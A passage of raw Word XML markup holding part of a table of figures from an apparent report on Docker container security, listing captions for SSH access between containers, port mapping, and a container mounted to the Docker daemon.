            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867512 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>44</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1C8DAE14" w14:textId="2DF9F860"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13" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 32: image created for the SSH enabled application.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867513 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>45</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="025C03B8" w14:textId="5E101BDB"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14" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 33: Docker image created for the NON-SSH application.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867514 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>45</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1F076424" w14:textId="13BE933F"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15" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 34: launching the two containers.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867515 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>46</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="799978B1" w14:textId="78E63C8F"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16" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 35: Alpine container with access to the shell.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867516 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>46</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0FB81750" w14:textId="50CBE519"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17" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 36: testing and checking the containers.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867517 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>46</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="24631907" w14:textId="2613AEF0"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18" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 37: output of Docker network inspect bridge.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867518 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>47</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="08C3E788" w14:textId="519E4674"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19" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 38: port published to the host.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867519 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>47</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5E95F28B" w14:textId="6298268C"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20" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 39: ssh into the con_ssh via the forwarded port.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867520 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>48</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3986A9CB" w14:textId="1A233B2C"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21" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 40: host ssh to the con_nossh container.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867521 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>48</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7E2CAEC7" w14:textId="789A49B5"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22" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 41: ssh from con_ssh to con_nossh.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867522 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>49</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="133A06ED" w14:textId="1476DE28"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23" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 42: Alpine ssh to the con_nossh container.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867523 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>49</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="342864AD" w14:textId="09C4AA4C"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24" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 43: identifying the systems.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867524 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>50</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0CAB0BA1" w14:textId="60DD8353"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25" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 44: launching Docker container mounted to the Docker daemon.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867525 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>50</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="18E9DD9B" w14:textId="6C77AA34"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26" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 45: identifying things on the host system.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867526 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>50</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5EE74D09" w14:textId="5C208DA1"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27" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 46: Docker images on the host.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867527 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>51</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6A834848" w14:textId="2183202D"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28" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 47: Creating busybox container.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867528 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>51</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4978CF38" w14:textId="77249911"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29" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 48: Exploring the Docker host directories.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867529 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>51</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3AB261C0" w14:textId="02D2D2C7"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30" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 49: Starting the container for the application.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867530 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>52</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="685CC463" w14:textId="11EF975D"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31" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 50: Accessing the application via the mapped port.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
